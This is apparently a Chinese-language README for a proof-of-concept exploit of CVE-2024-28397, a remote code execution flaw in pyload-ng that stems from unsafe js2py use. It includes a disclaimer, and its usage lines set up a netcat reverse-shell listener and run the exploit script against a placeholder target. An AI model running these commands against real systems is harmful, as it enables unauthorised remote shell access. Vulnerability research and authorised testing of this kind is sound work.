本仓库包含针对 CVE-2024-28397 的概念验证(PoC) 利用代码,该漏洞是 pyload-ng 因不安全使用 js2py 而导致的远程代码执行漏洞。
免责声明:
此 PoC 仅用于教育和研究目的。
请勿在非您所有或未经明确授权测试的系统上使用。
作者对任何滥用此代码的行为概不负责。
pyload-ng 中的 js2py你需要 Python 3.x、requests 库,以及用于接收反弹 Shell 的 netcat。
/run_code 接口的存在漏洞的 pyload-ng 实例nc -lvnp 4444
python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123